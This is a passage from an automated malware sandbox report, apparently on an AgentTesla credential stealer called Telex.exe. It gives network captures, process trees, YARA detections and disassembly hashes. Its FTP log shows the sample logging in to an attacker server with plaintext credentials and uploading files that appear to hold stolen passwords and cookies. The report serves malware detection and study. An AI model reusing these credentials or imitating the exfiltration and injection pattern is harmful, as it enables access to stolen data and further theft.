May 12, 2021 20:46:53.574423075 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.770802975 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:53.777683020 CEST	49729	31991	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.778069019 CEST	49729	31991	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.815486908 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.976913929 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:53.980040073 CEST	31991	49729	192.145.239.54	192.168.2.5
May 12, 2021 20:46:53.980690956 CEST	31991	49729	192.145.239.54	192.168.2.5
May 12, 2021 20:46:53.980756998 CEST	49729	31991	192.168.2.5	192.145.239.54
May 12, 2021 20:46:54.018568993 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.153923988 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.350323915 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:55.351337910 CEST	49732	31947	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.393686056 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.547892094 CEST	31947	49732	192.145.239.54	192.168.2.5
May 12, 2021 20:46:55.548641920 CEST	49732	31947	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.548857927 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.745430946 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:55.746002913 CEST	49732	31947	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.746031046 CEST	49732	31947	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.800036907 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.942820072 CEST	31947	49732	192.145.239.54	192.168.2.5
May 12, 2021 20:46:55.942846060 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:55.942857981 CEST	31947	49732	192.145.239.54	192.168.2.5
May 12, 2021 20:46:55.942959070 CEST	49732	31947	192.168.2.5	192.145.239.54
May 12, 2021 20:46:55.987512112 CEST	49728	21	192.168.2.5	192.145.239.54

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 20:45:03.257252932 CEST	65307	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:03.296060085 CEST	64344	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:03.314757109 CEST	53	65307	8.8.8.8	192.168.2.5
May 12, 2021 20:45:03.356240034 CEST	53	64344	8.8.8.8	192.168.2.5
May 12, 2021 20:45:03.459317923 CEST	62060	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:03.516536951 CEST	53	62060	8.8.8.8	192.168.2.5
May 12, 2021 20:45:03.842657089 CEST	61805	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:03.891359091 CEST	53	61805	8.8.8.8	192.168.2.5
May 12, 2021 20:45:04.591690063 CEST	54795	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:04.640467882 CEST	53	54795	8.8.8.8	192.168.2.5
May 12, 2021 20:45:05.435034990 CEST	49557	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:05.483999968 CEST	53	49557	8.8.8.8	192.168.2.5
May 12, 2021 20:45:06.282599926 CEST	61733	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:06.332595110 CEST	53	61733	8.8.8.8	192.168.2.5
May 12, 2021 20:45:07.435309887 CEST	65447	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:07.494334936 CEST	53	65447	8.8.8.8	192.168.2.5
May 12, 2021 20:45:08.078578949 CEST	52441	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:08.127372980 CEST	53	52441	8.8.8.8	192.168.2.5
May 12, 2021 20:45:09.157319069 CEST	62176	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:09.216285944 CEST	53	62176	8.8.8.8	192.168.2.5
May 12, 2021 20:45:09.996418953 CEST	59596	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:10.045274019 CEST	53	59596	8.8.8.8	192.168.2.5
May 12, 2021 20:45:10.767517090 CEST	65296	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:10.820956945 CEST	53	65296	8.8.8.8	192.168.2.5
May 12, 2021 20:45:11.747227907 CEST	63183	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:11.796951056 CEST	53	63183	8.8.8.8	192.168.2.5
May 12, 2021 20:45:13.751530886 CEST	60151	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:13.803399086 CEST	53	60151	8.8.8.8	192.168.2.5
May 12, 2021 20:45:14.790069103 CEST	56969	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:14.838893890 CEST	53	56969	8.8.8.8	192.168.2.5
May 12, 2021 20:45:28.258604050 CEST	55161	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:28.322740078 CEST	53	55161	8.8.8.8	192.168.2.5
May 12, 2021 20:45:39.559171915 CEST	54757	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:39.632853031 CEST	53	54757	8.8.8.8	192.168.2.5
May 12, 2021 20:45:49.860152006 CEST	49992	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:49.921536922 CEST	53	49992	8.8.8.8	192.168.2.5
May 12, 2021 20:45:58.491646051 CEST	60075	53	192.168.2.5	8.8.8.8
May 12, 2021 20:45:58.553474903 CEST	53	60075	8.8.8.8	192.168.2.5
May 12, 2021 20:46:17.154283047 CEST	55016	53	192.168.2.5	8.8.8.8
May 12, 2021 20:46:17.227775097 CEST	53	55016	8.8.8.8	192.168.2.5
May 12, 2021 20:46:25.530039072 CEST	64345	53	192.168.2.5	8.8.8.8
May 12, 2021 20:46:25.594520092 CEST	53	64345	8.8.8.8	192.168.2.5
May 12, 2021 20:46:44.101670027 CEST	57128	53	192.168.2.5	8.8.8.8
May 12, 2021 20:46:44.174969912 CEST	53	57128	8.8.8.8	192.168.2.5
May 12, 2021 20:46:51.567100048 CEST	54791	53	192.168.2.5	8.8.8.8
May 12, 2021 20:46:51.709338903 CEST	53	54791	8.8.8.8	192.168.2.5
May 12, 2021 20:46:53.351011992 CEST	50463	53	192.168.2.5	8.8.8.8
May 12, 2021 20:46:53.419301987 CEST	53	50463	8.8.8.8	192.168.2.5
May 12, 2021 20:46:55.115961075 CEST	50394	53	192.168.2.5	8.8.8.8
May 12, 2021 20:46:55.181477070 CEST	53	50394	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 20:46:51.567100048 CEST	192.168.2.5	8.8.8.8	0x1ad2	Standard query (0)	ftp.universalinks.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 12, 2021 20:45:03.516536951 CEST	8.8.8.8	192.168.2.5	0x6701	No error (0)	api.globalsign.cloud	104.18.24.243	A (IP address)	IN (0x0001)
May 12, 2021 20:45:03.516536951 CEST	8.8.8.8	192.168.2.5	0x6701	No error (0)	api.globalsign.cloud	104.18.25.243	A (IP address)	IN (0x0001)
May 12, 2021 20:46:51.709338903 CEST	8.8.8.8	192.168.2.5	0x1ad2	No error (0)	ftp.universalinks.net	192.145.239.54	A (IP address)	IN (0x0001)

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
May 12, 2021 20:46:52.148454905 CEST	21	49728	192.145.239.54	192.168.2.5	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 30 minutes of inactivity.
May 12, 2021 20:46:52.150908947 CEST	49728	21	192.168.2.5	192.145.239.54	USER bring4@universalinks.net
May 12, 2021 20:46:52.347407103 CEST	21	49728	192.145.239.54	192.168.2.5	331 User bring4@universalinks.net OK. Password required
May 12, 2021 20:46:52.348239899 CEST	49728	21	192.168.2.5	192.145.239.54	PASS {lafa{u^wEx8
May 12, 2021 20:46:52.571746111 CEST	21	49728	192.145.239.54	192.168.2.5	230 OK. Current restricted directory is /
May 12, 2021 20:46:52.769409895 CEST	21	49728	192.145.239.54	192.168.2.5	504 Unknown command
May 12, 2021 20:46:52.773770094 CEST	49728	21	192.168.2.5	192.145.239.54	PWD
May 12, 2021 20:46:52.970360041 CEST	21	49728	192.145.239.54	192.168.2.5	257 "/" is your current location
May 12, 2021 20:46:52.975579023 CEST	49728	21	192.168.2.5	192.145.239.54	TYPE I
May 12, 2021 20:46:53.172095060 CEST	21	49728	192.145.239.54	192.168.2.5	200 TYPE is now 8-bit binary
May 12, 2021 20:46:53.172394037 CEST	49728	21	192.168.2.5	192.145.239.54	PASV
May 12, 2021 20:46:53.368855000 CEST	21	49728	192.145.239.54	192.168.2.5	227 Entering Passive Mode (192,145,239,54,124,247)
May 12, 2021 20:46:53.574423075 CEST	49728	21	192.168.2.5	192.145.239.54	STOR PW_user-287400_2021_05_12_23_51_50.html
May 12, 2021 20:46:53.770802975 CEST	21	49728	192.145.239.54	192.168.2.5	150 Accepted data connection
May 12, 2021 20:46:53.976913929 CEST	21	49728	192.145.239.54	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.206 seconds (measured here), 2.20 Kbytes per second
May 12, 2021 20:46:55.153923988 CEST	49728	21	192.168.2.5	192.145.239.54	PASV
May 12, 2021 20:46:55.350323915 CEST	21	49728	192.145.239.54	192.168.2.5	227 Entering Passive Mode (192,145,239,54,124,203)
May 12, 2021 20:46:55.548857927 CEST	49728	21	192.168.2.5	192.145.239.54	STOR CO_user-287400_2021_05_12_23_51_54.zip
May 12, 2021 20:46:55.745430946 CEST	21	49728	192.145.239.54	192.168.2.5	150 Accepted data connection
May 12, 2021 20:46:55.942846060 CEST	21	49728	192.145.239.54	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.197 seconds (measured here), 6.52 Kbytes per second

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Telex.exe PID: 6352 Parent PID: 5572

General

Start time:	20:45:09
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\Telex.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Telex.exe'
Imagebase:	0x440000
File size:	879616 bytes
MD5 hash:	01FE9288B37BDEB3684DB4BD497685E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Telex.exe PID: 6424 Parent PID: 6352

General

Start time:	20:45:12
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\Telex.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Telex.exe
Imagebase:	0x7e0000
File size:	879616 bytes
MD5 hash:	01FE9288B37BDEB3684DB4BD497685E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.502933000.0000000002C03000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: mDPTQJF1.exe PID: 4652 Parent PID: 3472

General

Start time:	20:45:43
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
Imagebase:	0x140000
File size:	879616 bytes
MD5 hash:	01FE9288B37BDEB3684DB4BD497685E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: mDPTQJF1.exe PID: 6100 Parent PID: 4652

General

Start time:	20:45:49
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Imagebase:	0x100000
File size:	879616 bytes
MD5 hash:	01FE9288B37BDEB3684DB4BD497685E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mDPTQJF1.exe PID: 4724 Parent PID: 4652

General

Start time:	20:45:50
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Imagebase:	0x360000
File size:	879616 bytes
MD5 hash:	01FE9288B37BDEB3684DB4BD497685E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mDPTQJF1.exe PID: 5920 Parent PID: 4652

General

Start time:	20:45:50
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Imagebase:	0xb50000
File size:	879616 bytes
MD5 hash:	01FE9288B37BDEB3684DB4BD497685E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: mDPTQJF1.exe PID: 852 Parent PID: 3472

General

Start time:	20:45:51
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
Imagebase:	0xb10000
File size:	879616 bytes
MD5 hash:	01FE9288B37BDEB3684DB4BD497685E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Telex.exe PID: 6352 Parent PID: 5572 Telex.exeCOMMON

Executed Functions

Function 02676948, Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8e92b73788c1d842c90f3950cf7fee250d8a2662eec7bab52ead2b128f4859
Instruction ID: 1f2ac1813e4431bbd8192bc14f35e9fa5c7f7b1e05153132ec56ae5898dbed34
Opcode Fuzzy Hash: cb8e92b73788c1d842c90f3950cf7fee250d8a2662eec7bab52ead2b128f4859
Instruction Fuzzy Hash: 7A328A70B016049FDB19DB79E490BAEB7FAAF88704F24806DE5069B3A1CB35ED05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B14C, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314f9d29749fcae2c3f563d83984bd8883359e5f5d9002f2063b567e2d7b0dac
Instruction ID: ee4e246e9b29f4c16fdc147f73c2fdf6bdbdab58457ab85218224d729d84865c
Opcode Fuzzy Hash: 314f9d29749fcae2c3f563d83984bd8883359e5f5d9002f2063b567e2d7b0dac
Instruction Fuzzy Hash: 07916B35E003198FCB04DFA0D9549DDBBBAFF89314F149619E505BB7A4EB30A989CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B140, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc44d12664853f74d7b3bb3dacf121802158bab86f09b7eec7e882b0997c3a63
Instruction ID: 8575d3df46ae778f7c1a00926f5168bffaa691cb9eda27fea3e40b491408f962
Opcode Fuzzy Hash: bc44d12664853f74d7b3bb3dacf121802158bab86f09b7eec7e882b0997c3a63
Instruction Fuzzy Hash: 9D819E35E003198FCB04DFA0D9548DDBBBAFF8A314B148619E515BB7A0EB30A989CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E9DF71, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e4d1c3f448fce6a1e21b33c6a9d9f1ee31deefe95d3b5d9ca8aaff538319d9
Instruction ID: a55bc0821a77acc735de9ed6d80d78ae147d520c9b77935601aca7aa7a318b61
Opcode Fuzzy Hash: 60e4d1c3f448fce6a1e21b33c6a9d9f1ee31deefe95d3b5d9ca8aaff538319d9
Instruction Fuzzy Hash: 00817C35E003198FCB04DFA0D9549DDB7BAFF8A314F148619E515BB7A0EB30A999CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02676138, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fee70739c8233ce13d68812d800d5151537c28cd12e6c3fb5c21be35c21b9d
Instruction ID: c6c1a403e4c5b3ce42d01f3f03f0d47b2e4b163dba6bc3534684d9f4b066d40c
Opcode Fuzzy Hash: 51fee70739c8233ce13d68812d800d5151537c28cd12e6c3fb5c21be35c21b9d
Instruction Fuzzy Hash: 4A117C70C042588FDB148FA9D818BEEBFF5BB4E315F14906AE405B3392C7788944CB68

Uniqueness

Uniqueness Score: -1.00%

Function 02676148, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13cd2e363f80f6abad2d2ee53f980f0bd588f6024bc6ce60ede7ae4cf2bfd543
Instruction ID: eb80def7016eeb56f3f81414886e982346ccc88aa6af22ebaa4c8d169810041b
Opcode Fuzzy Hash: 13cd2e363f80f6abad2d2ee53f980f0bd588f6024bc6ce60ede7ae4cf2bfd543
Instruction Fuzzy Hash: DA112730D052588FDB14CFA9D818BEEBBF5BB4E315F14906AD405B3291CB788944CB68

Uniqueness

Uniqueness Score: -1.00%

Function 026761FC, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd849b38b8568e4381ecbaa8060aa2cb85adb646e0d2967c9637d9fdef5777f8
Instruction ID: 0bfdfa63d80184cb4538385e4b5d7d3e8e2d373ea1cae6a60399db3d36b5e474
Opcode Fuzzy Hash: bd849b38b8568e4381ecbaa8060aa2cb85adb646e0d2967c9637d9fdef5777f8
Instruction Fuzzy Hash: 98E02260C4D296CFD7120FA4D8682BABFB0FB1B201F00408AC442B72A2C37C8206C761

Uniqueness

Uniqueness Score: -1.00%

Function 026727DC, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02672A1E

Strings

;nk, xrefs: 02672823
;nk, xrefs: 02672852

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: CreateProcess
String ID: ;nk$;nk
API String ID: 963392458-2865535414
Opcode ID: 2d2b674b30b5dffd67345a332246b29dbdb665cdf107c0746005a6ec9ef150bd
Instruction ID: 6339f5f97ae7456a019a3b4ceb46618ba2c020b655e159ba4d6d58eaa55d6840
Opcode Fuzzy Hash: 2d2b674b30b5dffd67345a332246b29dbdb665cdf107c0746005a6ec9ef150bd
Instruction Fuzzy Hash: 1F916A71D04219CFEB24CF69D9917EEBBB2BF48314F0481A9E849A7340DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 026727E8, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02672A1E

Strings

;nk, xrefs: 02672823
;nk, xrefs: 02672852

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: CreateProcess
String ID: ;nk$;nk
API String ID: 963392458-2865535414
Opcode ID: 2a36fb80c846fcf49ca07f97153b7860c31577779b4b3535f7b5d444aaa42620
Instruction ID: 19b5ccb6cbdb5fe38fb1cc8b3119e4f21d1c22f7faab98cc0239ddcac09d676b
Opcode Fuzzy Hash: 2a36fb80c846fcf49ca07f97153b7860c31577779b4b3535f7b5d444aaa42620
Instruction Fuzzy Hash: 1D915871D04219CFEB24CF69D9917EEBBB2BF48318F0481A9D809A7380DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B0F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E9DD8A

Strings

;nk, xrefs: 00E9DCA6
;nk, xrefs: 00E9DCC6

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: CreateWindow
String ID: ;nk$;nk
API String ID: 716092398-2865535414
Opcode ID: 90ee903c8872494c06a30f54d11a03ceb91ef19ababcf585ba544311eac4a5f8
Instruction ID: 7aa5fff5539b23cd228d63093faf63e4afe35defc66fb855f8bc0e5ba983ab24
Opcode Fuzzy Hash: 90ee903c8872494c06a30f54d11a03ceb91ef19ababcf585ba544311eac4a5f8
Instruction Fuzzy Hash: C151B0B1D043199FDF14CFA9C984ADEBBB5BF48314F24822AE415BB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B0FC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E9DD8A

Strings

;nk, xrefs: 00E9DCA6
;nk, xrefs: 00E9DCC6

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: CreateWindow
String ID: ;nk$;nk
API String ID: 716092398-2865535414
Opcode ID: fdf8a8ef43e2d40b11819352be2858a2bdf73647991c3f354ce3e09dd0150dcb
Instruction ID: 1c0cb06b7b29c7fa267c9a825e94acf1f2e19bd30cf71cb8bae0b2b841bf7f4e
Opcode Fuzzy Hash: fdf8a8ef43e2d40b11819352be2858a2bdf73647991c3f354ce3e09dd0150dcb
Instruction Fuzzy Hash: 7651B0B1D043199FDF14CF99C984ADEBBB5BF48314F24822AE819BB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E9DC6D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E9DD8A

Strings

;nk, xrefs: 00E9DCA6
;nk, xrefs: 00E9DCC6

Memory Dump Source

Source File: 00000000.00000002.238308590.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false

Similarity

API ID: CreateWindow
String ID: ;nk$;nk
API String ID: 716092398-2865535414
Opcode ID: 9621b63b64735039a4ef592fe9182ea0e6620326fa8eb2c630cfd88ab34269a1
Instruction ID: 3efc7264fcd949731a9e8ff55877a3aaa8276eee1d78e4d5ed1f053d519a4eb2
Opcode Fuzzy Hash: 9621b63b64735039a4ef592fe9182ea0e6620326fa8eb2c630cfd88ab34269a1
Instruction Fuzzy Hash: C251C2B1D043189FDF14CFA9C980ADEBBB5BF48314F24812AE819AB210D7749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02672378, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 02672446

Strings

;nk, xrefs: 026723E4

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: ContextThread
String ID: ;nk
API String ID: 1591575202-1634272568
Opcode ID: 70a623e177c5acd98d13354221bcfbc3f75a33bc5e97ca8298071d54fc338666
Instruction ID: 21d5260490bdda36d1a46363649f26da4c1f188c35ff754af24a068c02a372ae
Opcode Fuzzy Hash: 70a623e177c5acd98d13354221bcfbc3f75a33bc5e97ca8298071d54fc338666
Instruction Fuzzy Hash: E931E0719087848FCB12CFA8C8917DEBFF0EF49214F08816ED598A7602D7389559CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02672560, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026725F0

Strings

;nk, xrefs: 0267257F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID: ;nk
API String ID: 3559483778-1634272568
Opcode ID: 7322a1057d1b8a461eb5fa9ae9d08718965b111a8a9b1deb01c8459e42e68ffa
Instruction ID: 03193558152c317cf4b88d439c71dbb0029a17ca5a088b4eab3902e95bd2142c
Opcode Fuzzy Hash: 7322a1057d1b8a461eb5fa9ae9d08718965b111a8a9b1deb01c8459e42e68ffa
Instruction Fuzzy Hash: A12144B19003499FCB10CFA9C980BDEBBF4FF48314F00842AE919A7240C778A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02672558, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026725F0

Strings

;nk, xrefs: 0267257F

Memory Dump Source

Source File: 00000000.00000002.238374144.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID: ;nk
API String ID: 3559483778-1634272568
